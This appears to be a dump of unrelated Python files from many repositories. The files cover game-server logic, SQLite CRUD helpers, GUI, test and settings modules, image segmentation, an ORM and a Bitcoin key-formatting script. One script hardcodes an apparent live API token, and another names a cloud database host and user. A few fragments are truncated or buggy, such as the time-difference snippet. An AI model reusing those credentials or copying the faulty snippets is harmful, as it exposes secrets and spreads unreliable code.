for (dnaGroup, viewPad) in zip(viewingPadGroups, self.viewingPads):
foundViewingBlocks = self.findStartingBlocks(dnaGroup, viewPad)
self.viewingBlocks.extend(foundViewingBlocks)
for viewingBlock in foundViewingBlocks:
viewPad.addStartingBlock(viewingBlock)
def findLeaderBoards(self, dnaData, zoneId):
return [] # TODO
def createLeaderBoards(self):
self.leaderBoards = []
dnaData = self.air.dnaDataMap[self.zoneId]
if dnaData.getName() == 'root':
self.leaderBoards = self.findLeaderBoards(dnaData, self.zoneId)
for leaderBoard in self.leaderBoards:
if not leaderBoard:
continue
if 'city' in leaderBoard.getName():
leaderBoardType = 'city'
elif 'stadium' in leaderBoard.getName():
leaderBoardType = 'stadium'
elif 'country' in leaderBoard.getName():
leaderBoardType = 'country'
for subscription in RaceGlobals.LBSubscription[leaderBoardType]:
leaderBoard.subscribeTo(subscription)
def cycleLeaderBoards(self, task=None):
messenger.send('leaderBoardSwap-' + str(self.zoneId))
taskMgr.doMethodLater(10, self.cycleLeaderBoards, 'leaderBoardSwitch')
def createClassicChar(self):
self.classicChar = DistributedGoofySpeedwayAI.DistributedGoofySpeedwayAI(self.air)
self.classicChar.generateWithRequired(self.zoneId)
self.classicChar.start()
import sqlite3
def connect():
'''it is used to connect to the database books'''
conn=sqlite3.connect("books.db")
cur=conn.cursor()
cur.execute("CREATE TABLE IF NOT EXISTS book(id integer PRIMARY KEY,title text,author text,year text,isbn integer)")
conn.commit()
conn.close()
def insert(title,author,year,isbn):
''' it is used to inset into the database '''
conn=sqlite3.connect("books.db")
cur=conn.cursor()
cur.execute("INSERT INTO book values (Null,?,?,?,?)",(title,author,year,isbn))
conn.commit()
conn.close()
def view():
''' it is used to view all the enteries in the book table of a books database '''
conn=sqlite3.connect("books.db")
cur=conn.cursor()
cur.execute("SELECT * FROM book")
rows=cur.fetchall()
conn.close()
return rows
def search(title="",author="",year="",isbn=""):
''' it is used to search the entries
null string are passed so that user can select any one of them '''
conn=sqlite3.connect("books.db")
cur=conn.cursor()
cur.execute("SELECT * FROM book where title=? or author=? or year=? or isbn=?",(title,author,year,isbn))
conn.commit()
rows=cur.fetchall()
conn.close()
return rows
def update(id,title,author,year,isbn):
''' it updates the values according to the id selected in the user interface '''
conn=sqlite3.connect("books.db")
cur=conn.cursor()
cur.execute("UPDATE book SET title=?,author=?,year=?,isbn=? where id=?",(title,author,year,isbn,id))
conn.commit()
conn.close()
def delete(id):
''' deletes according to the id selected'''
conn=sqlite3.connect("books.db")
cur=conn.cursor()
cur.execute("DELETE FROM book WHERE id=?",(id,)) #(id,) commas has been used besides id so that it is passed as a tuple
conn.commit()
conn.close()
def delete_all():
conn=sqlite3.connect("books.db")
cur=conn.cursor()
cur.execute("DELETE FROM book")
conn.commit()
conn.close()
1,847
gpvdm_gui/gui/lasers.py
roderickmackenzie/gpvdm
12
2022876
#
# General-purpose Photovoltaic Device Model - a drift diffusion base/Shockley-Read-Hall
# model for 1st, 2nd and 3rd generation solar cells.
# Copyright (C) 2008-2022 <NAME> r.<EMAIL>.<EMAIL> at googlemail.com
#
# https://www.gpvdm.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License v2.0, as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
## @package lasers
# Main laser editor window.
#
import os
import webbrowser
from tab import tab_class
from icon_lib import icon_get
import i18n
_ = i18n.language.gettext
#qt
from PyQt5.QtWidgets import QMainWindow, QTextEdit, QAction, QApplication
from PyQt5.QtGui import QIcon, QPainter, QFont, QColor
from PyQt5.QtCore import QSize, Qt
from PyQt5.QtWidgets import QWidget,QSizePolicy,QVBoxLayout,QPushButton,QDialog,QFileDialog,QToolBar,QLabel,QComboBox, QTabWidget,QStatusBar,QMenuBar, QTabBar, QStylePainter, QStyleOptionTab,QStyle
#window
from gui_util import yes_no_dlg
from gui_util import dlg_get_text
from util import wrap_text
from QWidgetSavePos import QWidgetSavePos
from cal_path import get_sim_path
from css import css_apply
from experiment import experiment
class lasers(experiment):
def __init__(self,data=None):
experiment.__init__(self,window_save_name="laser_editor", window_title=_("Laser editor"),name_of_tab_class="jvexperiment_tab",json_search_path="gpvdm_data().lasers")
self.notebook.currentChanged.connect(self.switch_page)
#self.ribbon.tb_save.setVisible(False)
self.switch_page()
def switch_page(self):
tab = self.notebook.currentWidget()
#self.tb_lasers.update(tab.data)
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import pandas as pd
from qf_lib.common.enums.frequency import Frequency
from qf_lib.common.enums.price_field import PriceField
from qf_lib.common.tickers.tickers import CcyTicker
from qf_lib.common.utils.dateutils.string_to_date import str_to_date
from qf_lib.containers.dataframe.prices_dataframe import PricesDataFrame
from qf_lib.containers.dataframe.qf_dataframe import QFDataFrame
from qf_lib.containers.qf_data_array import QFDataArray
from qf_lib.containers.series.prices_series import PricesSeries
from qf_lib.containers.series.qf_series import QFSeries
from qf_lib.data_providers.cryptocurrency.cryptocurrency_data_provider import CryptoCurrencyDataProvider
@unittest.skip("CryptoCurrencyDataProvider needs update")
class TestCryptoCurrency(unittest.TestCase):
START_DATE = str_to_date('2016-01-01')
END_DATE = str_to_date('2017-02-02')
SINGLE_FIELD = 'Close'
MANY_FIELDS = ['Open', 'Volume', 'Close']
SINGLE_TICKER = CcyTicker('Bitcoin')
MANY_TICKERS = [CcyTicker('Bitcoin'), CcyTicker('Ethereum'), CcyTicker('Ripple')]
NUM_OF_DATES = 399
SINGLE_PRICE_FIELD = PriceField.Close
MANY_PRICE_FIELDS = [PriceField.Close, PriceField.Open, PriceField.High]
def setUp(self):
self.cryptocurrency_provider = CryptoCurrencyDataProvider()
# =========================== Test get_price method ==========================================================
def test_price_single_ticker_single_field(self):
# single ticker, single field; end_date by default now, frequency by default DAILY, currency by default None
data = self.cryptocurrency_provider.get_price(tickers=self.SINGLE_TICKER, fields=self.SINGLE_PRICE_FIELD,
start_date=self.START_DATE, end_date=self.END_DATE,
frequency=Frequency.DAILY)
self.assertIsInstance(data, PricesSeries)
self.assertEqual(len(data), self.NUM_OF_DATES)
self.assertEqual(data.name, self.SINGLE_TICKER.as_string())
def test_price_single_ticker_multiple_fields(self):
# single ticker, many fields; can be the same as for single field???
data = self.cryptocurrency_provider.get_price(tickers=self.SINGLE_TICKER, fields=self.MANY_PRICE_FIELDS,
start_date=self.START_DATE, end_date=self.END_DATE,
frequency=Frequency.DAILY)
self.assertEqual(type(data), PricesDataFrame)
self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_PRICE_FIELDS)))
self.assertEqual(list(data.columns), self.MANY_PRICE_FIELDS)
def test_price_multiple_tickers_single_field(self):
data = self.cryptocurrency_provider.get_price(tickers=self.MANY_TICKERS, fields=self.SINGLE_PRICE_FIELD,
start_date=self.START_DATE, end_date=self.END_DATE,
frequency=Frequency.DAILY)
self.assertEqual(type(data), PricesDataFrame)
self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_TICKERS)))
self.assertEqual(list(data.columns), self.MANY_TICKERS)
def test_price_multiple_tickers_multiple_fields(self):
# testing for single date (start_date and end_date are the same)
data = self.cryptocurrency_provider.get_price(tickers=self.MANY_TICKERS, fields=self.MANY_PRICE_FIELDS,
start_date=self.START_DATE, end_date=self.END_DATE,
frequency=Frequency.DAILY)
self.assertEqual(type(data), QFDataArray)
self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_TICKERS), len(self.MANY_PRICE_FIELDS)))
self.assertIsInstance(data.dates.to_index(), pd.DatetimeIndex)
self.assertEqual(list(data.tickers), self.MANY_TICKERS)
self.assertEqual(list(data.fields), self.MANY_PRICE_FIELDS)
# =========================== Test get_history method ==========================================================
def test_historical_single_ticker_single_field(self):
# single ticker, single field; end_date by default now, frequency by default DAILY, currency by default None
data = self.cryptocurrency_provider.get_history(tickers=self.SINGLE_TICKER, fields=self.SINGLE_FIELD,
start_date=self.START_DATE, end_date=self.END_DATE)
self.assertIsInstance(data, QFSeries)
self.assertEqual(len(data), self.NUM_OF_DATES)
self.assertEqual(data.name, self.SINGLE_TICKER.as_string())
def test_historical_single_ticker_multiple_fields(self):
# single ticker, many fields; can be the same as for single field???
data = self.cryptocurrency_provider.get_history(tickers=self.SINGLE_TICKER, fields=self.MANY_FIELDS,
start_date=self.START_DATE, end_date=self.END_DATE)
self.assertEqual(type(data), QFDataFrame)
self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_FIELDS)))
self.assertEqual(list(data.columns), self.MANY_FIELDS)
def test_historical_multiple_tickers_single_field(self):
data = self.cryptocurrency_provider.get_history(tickers=self.MANY_TICKERS, fields=self.SINGLE_FIELD,
start_date=self.START_DATE, end_date=self.END_DATE)
self.assertEqual(type(data), QFDataFrame)
self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_TICKERS)))
self.assertEqual(list(data.columns), self.MANY_TICKERS)
def test_historical_multiple_tickers_multiple_fields_one_date(self):
# testing for single date (start_date and end_date are the same)
data = self.cryptocurrency_provider.get_history(tickers=self.MANY_TICKERS, fields=self.MANY_FIELDS,
start_date=self.END_DATE, end_date=self.END_DATE)
self.assertEqual(type(data), QFDataFrame)
self.assertEqual(data.shape, (len(self.MANY_TICKERS), len(self.MANY_FIELDS)))
self.assertEqual(list(data.index), self.MANY_TICKERS)
self.assertEqual(list(data.columns), self.MANY_FIELDS)
def test_historical_multiple_tickers_multiple_fields_many_dates(self):
# testing for single date (start_date and end_date are the same)
data = self.cryptocurrency_provider.get_history(tickers=self.MANY_TICKERS, fields=self.MANY_FIELDS,
start_date=self.START_DATE, end_date=self.END_DATE)
self.assertEqual(type(data), QFDataArray)
self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_TICKERS), len(self.MANY_FIELDS)))
self.assertIsInstance(data.dates.to_index(), pd.DatetimeIndex)
self.assertEqual(list(data.tickers), self.MANY_TICKERS)
self.assertEqual(list(data.fields), self.MANY_FIELDS)
if __name__ == '__main__':
unittest.main()
7,828
python-package/test/plot/test_aes.py
OLarionova-HORIS/lets-plot
0
2023098
#
# Copyright (c) 2019. JetBrains s.r.o.
# Use of this source code is governed by the MIT license that can be found in the LICENSE file.
#
import pytest
import lets_plot as gg
class TestWithListArgs:
result_empty = {'x': None, 'y': None}
result_xy = {'x': 'xVar', 'y': 'yVar'}
@pytest.mark.parametrize('args,expected', [
([], result_empty),
(['xVar', 'yVar'], result_xy),
])
def test_aes(self, args, expected):
spec = gg.aes(*args)
assert spec.as_dict() == expected
class TestWithDictArgs:
result_kwargs = {'x': 'xVar', 'y': 'yVar', 'size': 'sizeVar'}
@pytest.mark.parametrize('args,expected', [
(result_kwargs, result_kwargs),
])
def test_aes(self, args, expected):
spec = gg.aes(**args)
assert spec.as_dict() == expected
822
pytest_django_test/settings_sqlite_file.py
lendingloop/pytest-django
5,079
2022852
import tempfile
from .settings_base import * # noqa: F401 F403
# This is a SQLite configuration, which uses a file based database for
# tests (via setting TEST_NAME / TEST['NAME']).
# The name as expected / used by Django/pytest_django (tests/db_helpers.py).
_fd, _filename = tempfile.mkstemp(prefix="test_")
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": "/pytest_django_should_never_get_accessed",
"TEST": {"NAME": _filename},
}
}
498
automated_correction_module/word_seg_try.py
anaghrao-99/Digital-Portal-for-Schools
0
2024096
#grayscale
import numpy as np
import cv2
import imutils
from imutils import contours
import sys
import subprocess
import os
from pathlib import Path
filename_input = sys.argv[1]
def erode_image(filename):
img = cv2.imread(filename, cv2.IMREAD_GRAYSCALE)
# increase contrast
pxmin = np.min(img)
pxmax = np.max(img)
imgContrast = (img - pxmin) / (pxmax - pxmin) * 255
# increase line width
kernel = np.ones((4, 4), np.uint8)
imgMorph = cv2.erode(imgContrast, kernel, iterations = 2)
# write
cv2.imwrite(filename, imgMorph)
def get_contour_precedence(contour, cols):
origin = cv2.boundingRect(contour)
return origin[1] * cols + origin[0]
image = cv2.imread(filename_input)
# image = cv2.imread(filename)
gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
# cv2.imshow('gray',gray)
# cv2.waitKey(0)
#binary
ret,thresh = cv2.threshold(gray,127,255,cv2.THRESH_BINARY_INV)
#dilation
kernel = np.ones((5, 100), np.uint8)
img_dilation = cv2.dilate(thresh, kernel, iterations=5)
#find contours im2
ctrs, hier = cv2.findContours(img_dilation.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
#sort contours
# sorted_ctrs = sorted(ctrs, key=lambda ctr:get_contour_precedence(ctr, img_dilation.shape[1]))
for ctr in ctrs :
x, y, w, h = cv2.boundingRect(ctr)
sorted_ctrs = sorted(ctrs, key=lambda ctr: get_contour_precedence(ctr, img_dilation.shape[1]))
# sorted_ctrs = sorted(ctrs, key=lambda ctr: cv2.boundingRect(ctr)[0] + cv2.boundingRect(ctr)[1] * image.shape[1] )
path = os.path.abspath(os.getcwd()) + '/out_test/'
if(os.path.exists(path)):
for f in Path(path).glob('*.png'):
f.unlink()
for i, ctr in enumerate(sorted_ctrs):
# Get bounding box
x, y, w, h = cv2.boundingRect(ctr)
# Getting ROI
roi = image[y:y+h, x:x+w]
# show ROI
#print('segment no:' + str(i))
# cv2.imshow('segment no:'+str(i),roi)
string = 'out_test/'
string+= str(i)
string += '.png'
# initial_directory = os.path.abspath(os.getcwd())
cv2.imwrite(string, roi)
# erode_image(string)
# cv2.imshow(roi)
cv2.rectangle( image,(x,y),( x + w, y + h ),(90,0,255),2)
# cv2.waitKey(0)
# pipe = subprocess.check_call(["python", filename])
print("Splitting into lines is over")
2,296
src/providers/api/modules/etlMods.py
9LKQ7ZLC82/cccatalog
1
2024500
import logging
import os
import re
import requests
import time
import json
import argparse
import random
from datetime import datetime, timedelta
PATH = os.environ['OUTPUT_DIR']
def writeToFile(_data, _name):
outputFile = '{}{}'.format(PATH, _name)
if len(_data) < 1:
return None
logging.info('Writing to file => {}'.format(outputFile))
with open(outputFile, 'a') as fh:
for line in _data:
if line:
fh.write('\t'.join(line) + '\n')
def sanitizeString(_data):
if _data is None:
return ''
_data = _data.strip()
_data = _data.replace('"', "'")
_data = re.sub(r'\n|\r', ' ', _data)
return re.sub(r'\s+', ' ', _data)
def delayProcessing(_startTime, _maxDelay):
minDelay = 1.0
#subtract time elapsed from the requested delay
elapsed = float(time.time()) - float(_startTime)
delayInterval = round(_maxDelay - elapsed, 3)
waitTime = max(minDelay, delayInterval) #time delay between requests.
logging.info('Time delay: {} second(s)'.format(waitTime))
time.sleep(waitTime)
def requestContent(_url):
logging.info('Processing request: {}'.format(_url))
try:
response = requests.get(_url)
if response.status_code == requests.codes.ok:
return response.json()
else:
logging.warning('Unable to request URL: {}. Status code: {}'.format(url, response.status_code))
return None
except Exception as e:
logging.error('There was an error with the request.')
logging.info('{}: {}'.format(type(e).__name__, e))
return None
1,643
backend/api/serializers/model_year_report_make.py
kuanfandevops/zeva
0
2023115
from rest_framework.serializers import ModelSerializer
from api.models.model_year_report_make import ModelYearReportMake
class ModelYearReportMakeSerializer(ModelSerializer):
class Meta:
model = ModelYearReportMake
fields = (
'make',
)
279
AutomateTheBoringStuff/sameName.py
pythoncoder999/Python
1
2024508
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 26 23:49:56 2019
@author: <NAME>
"""
def spam():
eggs = "spam local"
print(eggs) # prints "spam local"
def bacon():
eggs = "bacon local"
print(eggs) # prints "bacon local"
spam()
print(eggs) #prints "bacon local"
eggs = "global"
bacon()
print(eggs) #prints "global"
# imports
import psycopg2
import pandas as pd
from psycopg2.extras import execute_values
# reading in titanic Data
df = pd.read_csv('titanic.csv')
# renaming columns in order to have them read into elephant
df['Siblings/Spouses Aboard'].rename('siblingsspouse', axis=1)
df['Parents/Children Aboard'].rename('parentschildren', axis=1)
# getting rid of unecessary apostrophies
df['Name'] = df['Name'].str.replace("'", "")
# creds for cloud DB, password is <PASSWORD>
dbname = 'cwsewxgg'
user = 'cwsewxgg' # ElephantSQL happens to use same name for db and user
password = ' ' # Sensitive! Don't share/commit
host = 'drona.db.elephantsql.com'
# connection to cloud
pg_conn = psycopg2.connect(dbname=dbname, user=user, password=password, host=host)
pg_curs = pg_conn.cursor()
# creating Titanic Table
create_titanic_table = """
DROP TABLE IF EXISTS Titanic;
CREATE TABLE Titanic (
index INT,
Survived INT,
Pclass INT,
Name TEXT,
Sex TEXT,
Age REAL,
siblingsspouse INT,
parentschildren INT,
Fare REAL
);
"""
# running table and committing table
pg_curs.execute(create_titanic_table)
pg_conn.commit()
# using the execute_values function - Would like to go over this again to enhance my understanding
execute_values(pg_curs, """
INSERT INTO Titanic
(Survived, Pclass, Name, Sex, Age, siblingsspouse, parentschildren, Fare)
VALUES %s;
""", [tuple(row) for row in df.values])
# commit
pg_conn.commit()
pg_curs.execute("""
SELECT *
FROM Titanic
LIMIT 1;
""")
# printing to validate
print(pg_curs.fetchall())
1,554
demo/tushare_native/broad_market_demo.py
WZYStudio/QuantJob
0
2024099
import tushare as ts
# 这个数据里有vol, ma5,ma10什么的,还是好用的
if __name__ == '__main__':
ts.set_token('c88ef7fb2542e2f89e9c79c2d22ce2421511da6af7f905f60c7a29b4')
days_deal = ts.get_hist_data('600584', start='2020-05-18', end='2020-05-21')
print(days_deal)
261
orm/manager.py
draihal/simple_orm_sqlite
0
2023771
from .db_helpers import attrs, copy_attrs, render_create_table_stmt
class Manager:
def __init__(self, db, model, type_check=True):
self.db = db
self.model = model
self.table_name = model.__name__
self.type_check = type_check
if not self._hastable():
self.db.executescript(render_create_table_stmt(self.model))
def all(self):
result = self.db.execute(f'SELECT * FROM {self.table_name}')
return (self.create(**row) for row in result.fetchall())
def create(self, **kwargs):
obj = object.__new__(self.model)
obj.__dict__ = kwargs
return obj
def delete(self, obj):
sql = 'DELETE from %s WHERE id = ?'
self.db.execute(sql % self.table_name, obj.id)
def get(self, id):
sql = f'SELECT * FROM {self.table_name} WHERE id = ?'
result = self.db.execute(sql, id)
row = result.fetchone()
if not row:
msg = 'Object%s with id does not exist: %s' % (self.model, id)
raise ValueError(msg)
return self.create(**row)
def has(self, id):
sql = f'SELECT id FROM {self.table_name} WHERE id = ?'
result = self.db.execute(sql, id)
return True if result.fetchall() else False
def save(self, obj):
if 'id' in obj.__dict__ and self.has(obj.id):
msg = 'Object%s id already registred: %s' % (self.model, obj.id)
raise ValueError(msg)
clone = copy_attrs(obj, remove=['id'])
self.type_check and self._isvalid(clone)
column_names = '%s' % ', '.join(clone.keys())
column_references = '%s' % ', '.join('?' for i in range(len(clone)))
sql = 'INSERT INTO %s (%s) VALUES (%s)'
sql = sql % (self.table_name, column_names, column_references)
result = self.db.execute(sql, *clone.values())
obj.id = result.lastrowid
return obj
def update(self, obj):
clone = copy_attrs(obj, remove=['id'])
self.type_check and self._isvalid(clone)
where_expressions = '= ?, '.join(clone.keys()) + '= ?'
sql = 'UPDATE %s SET %s WHERE id = ?' % (self.table_name, where_expressions)
self.db.execute(sql, *(list(clone.values()) + [obj.id]))
def _hastable(self):
sql = 'SELECT name len FROM sqlite_master WHERE type = ? AND name = ?'
result = self.db.execute(sql, 'table', self.table_name)
return True if result.fetchall() else False
def _isvalid(self, attr_values):
attr_types = attrs(self.model)
value_types = {a: v.__class__ for a, v in attr_values.items()}
for attr, value_type in value_types.items():
if value_type is not attr_types[attr]:
msg = "%s value should be type %s not %s"
raise TypeError(msg % (attr, attr_types[attr], value_type))
month = input()
days_sleeping = int(input())
price_studio = 0
price_apartment = 0
if month == "May" or month == "October":
price_studio = days_sleeping * 50
price_apartment = days_sleeping * 65
if days_sleeping > 14:
price_studio *= 0.70
elif days_sleeping > 7:
price_studio *= 0.95
if month == "June" or month == "September":
price_studio = days_sleeping * 75.20
price_apartment = days_sleeping * 68.70
if days_sleeping > 14:
price_studio *= 0.80
if month == "July" or month == "August":
price_studio = days_sleeping * 76
price_apartment = days_sleeping * 77
if days_sleeping > 14:
price_apartment *= 0.90
print(f"Apartment: {price_apartment:.2f} lv.")
print(f"Studio: {price_studio:.2f} lv.")
if diff < 59:
print("Early")
print(f"{diff} before the start")
elif diff > 59:
hours = diff // 60
minutes = diff = 60
print("Early")
print(f"{hours}:{minutes:.2d} hours before the start")
978
migrations/versions/0d2523c0cb8a_.py
monstersun/blog
0
2023130
"""empty message
Revision ID: 0d2523c0cb8a
Revises: <PASSWORD>
Create Date: 2017-12-13 19:29:39.010490
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('Post',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('body', sa.TEXT(), nullable=True),
sa.Column('timestamp', sa.DateTime(), nullable=True),
sa.Column('auther_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['auther_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_Post_timestamp'), 'Post', ['timestamp'], unique=False)
op.add_column('users', sa.Column('avatar_hash', sa.String(length=64), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('users', 'avatar_hash')
op.drop_index(op.f('ix_Post_timestamp'), table_name='Post')
op.drop_table('Post')
# ### end Alembic commands ###
1,174
mkrandomkeys.py
jadeblaquiere/keymaster
0
2024286
#!/usr/bin/python
# Copyright (c) 2016, <NAME> <<EMAIL>>
# All rights reserved
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of ecpy nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from ecpy.point import Point, Generator
import ecpy.curves as curves
from Crypto.Random import random
from Crypto.Hash import RIPEMD
from hashlib import sha256
import hashlib
from binascii import hexlify, unhexlify
from base58 import b58encode, b58decode
# set up elliptic curve environment
c = curves.curve_secp256k1
Point.set_curve(c)
G = Generator(c['G'][0], c['G'][1])
#mainnet
pub_prefix = '00'
prv_prefix = '80'
#testnet
pub_prefix = '6f'
prv_prefix = 'ef'
#simtest
pub_prefix = '3f'
prv_prefix = '64'
#ctindigonet
pub_prefix = '1c'
prv_prefix = 'bb'
#ctrednet
pub_prefix = '50'
prv_prefix = 'a3'
pub_prefix = '1c'
prv_prefix = 'bb'
def priv_key_fmt(prefix, keyhx):
# generate WIF format
# see: https://en.bitcoin.it/wiki/Wallet_import_format
# add header prefix
h_key = prefix + keyhx
# calc checksum
cksum = sha256(sha256(unhexlify(h_key)).digest()).hexdigest()[:8]
# encode base58
return b58encode(unhexlify(h_key + cksum))
def priv_key_fmt_C(prefix, keyhx):
# generate WIF format
# see: https://en.bitcoin.it/wiki/Wallet_import_format
# add header prefix
h_key = prefix + keyhx + '01'
# calc checksum
cksum = sha256(sha256(unhexlify(h_key)).digest()).hexdigest()[:8]
# encode base58
return b58encode(unhexlify(h_key + cksum))
def priv_key_decode(keyb58):
raw = hexlify(b58decode(keyb58))
h_key = raw[:66]
cksum = sha256(sha256(unhexlify(h_key)).digest()).hexdigest()[:8]
if cksum != raw[66:].decode('utf-8'):
raise ValueError('checksum mismatch')
return h_key[2:].decode('utf-8')
def priv_key_decode_C(keyb58):
raw = hexlify(b58decode(keyb58))
h_key = raw[:68]
cksum = sha256(sha256(unhexlify(h_key)).digest()).hexdigest()[:8]
if raw[66:68].decode('utf-8') != '01':
raise ValueError('format error')
if cksum != raw[68:].decode('utf-8'):
raise ValueError('checksum mismatch')
return h_key[2:66].decode('utf-8')
def pub_key_fmt(prefix, keyhx):
# generate V1 Address format
# see: https://en.bitcoin.it/wiki/Technical_background_of_version_1_Bitcoin_addresses
# hash key - sha256 then ripemd160
h = RIPEMD.new(sha256(unhexlify(keyhx)).digest())
# add header prefix
h_hashkey = prefix + hexlify(h.digest()).decode('utf-8')
# calc checksum
cksum = sha256(sha256(unhexlify(h_hashkey)).digest()).hexdigest()[:8]
# encode base58
return b58encode(unhexlify(h_hashkey + cksum))
def pub_key_fmt_C(prefix, keyhx):
# generate V1 Address format
# see: https://en.bitcoin.it/wiki/Technical_background_of_version_1_Bitcoin_addresses
# hash key - sha256 then ripemd160
keyval = keyhx
keybin = int(keyhx,16)
if keyhx[:2] == '04':
keyval = ('03' if (keybin % 2) else '02') + keyhx[2:66]
elif (keyhx[:2] != '02') and (keyhx[:2] != '03'):
raise ValueError('input is not ECC point format')
print('keyval = ' + keyval)
h = RIPEMD.new(sha256(unhexlify(keyval)).digest())
# add header prefix
h_hashkey = prefix + hexlify(h.digest()).decode('utf-8')
# calc checksum
cksum = sha256(sha256(unhexlify(h_hashkey)).digest()).hexdigest()[:8]
# encode base58
return b58encode(unhexlify(h_hashkey + cksum))
if __name__ == '__main__':
# private key is a random number between 1 and n
# (where n is "order" of curve generator point G)
p = random.randint(1,c['n']-1)
# p = 0x0C28FCA386C7A227600B2FE50B7CAE11EC86D3BF1FBE471BE89827E19D72AA1D
# p = 0x1111111111111111111111111111111111111111111111111111111111111111;
phx = '%064x' % p
print("PRIVATE KEY MATH : ")
print('rand privkey = ' + phx)
wif_priv = priv_key_fmt(prv_prefix, phx)
print("WIF privkey = " + wif_priv)
if p == 0x0C28FCA386C7A227600B2FE50B7CAE11EC86D3BF1FBE471BE89827E19D72AA1D:
assert wif_priv == '<KEY>'
if p == 0x1111111111111111111111111111111111111111111111111111111111111111:
assert wif_priv == '<KEY>'
#check that we can recover p from WIF
rhx = priv_key_decode(wif_priv)
# print('rxh, phx =', rhx, phx)
assert rhx == phx
wif_priv_C = priv_key_fmt_C(prv_prefix, phx)
print("WIF privkey Compressed = " + wif_priv_C)
if p == 0x1111111111111111111111111111111111111111111111111111111111111111:
assert wif_priv_C == '<KEY>'
#check that we can recover p from WIF
rhx = priv_key_decode_C(wif_priv_C)
# print('rxh, phx =', rhx, phx)
assert rhx == phx
print("PUBLIC KEY MATH : ")
# p = 0x18E14A7B6A307F426A94F8114701E7C8E774E7F9A47E2C2035DB29A206321725
P = G * p
Pa = P.affine()
pbhx = '04' + ('%064x' % Pa[0]) + ('%064x' % Pa[1])
print("point long fmt = " + pbhx)
wif_pub = pub_key_fmt(pub_prefix, pbhx)
print("WIF pubkey = " + wif_pub)
if p == 0x18E14A7B6A307F426A94F8114701E7C8E774E7F9A47E2C2035DB29A206321725:
assert wif_pub == '<KEY>'
if p == 0x1111111111111111111111111111111111111111111111111111111111111111:
assert wif_pub == '<KEY>'
wif_pub_C = pub_key_fmt_C(pub_prefix, pbhx)
print("WIF pubkey Compressed = " + wif_pub_C)
if p == 0x1111111111111111111111111111111111111111111111111111111111111111:
assert wif_pub_C == '<KEY>'
if False:
for i in range(0,255):
ihx = '%02x' % i
print(ihx + ' :priv: ' + priv_key_fmt(ihx, phx) + ' ' + priv_key_fmt_C(ihx, phx))
for i in range(0,255):
ihx = '%02x' % i
print(ihx + ' :pub: ' + pub_key_fmt(ihx, pbhx))
if False:
refprv = '<KEY>'
refder = '<KEY>'
refderp = '<KEY>'
refhx = hexlify(b58decode(refprv)).decode('utf8')
rdehx = hexlify(b58decode(refder)).decode('utf8')
rdphx = hexlify(b58decode(refderp)).decode('utf8')
print('rhx ' + refhx)
print('rdvx ' + rdehx)
print('rdpx ' + rdphx)
refprv = '<KEY>'
refder = '<KEY>'
refderp = '<KEY>'
refhx = hexlify(b58decode(refprv)).decode('utf8')
rdehx = hexlify(b58decode(refder)).decode('utf8')
rdphx = hexlify(b58decode(refderp)).decode('utf8')
print('crhx ' + refhx)
print('crdvx ' + rdehx)
print('crdpx ' + rdphx)
refprv = '<KEY>'
refder = '<KEY>'
refderp = '<KEY>'
refhx = hexlify(b58decode(refprv)).decode('utf8')
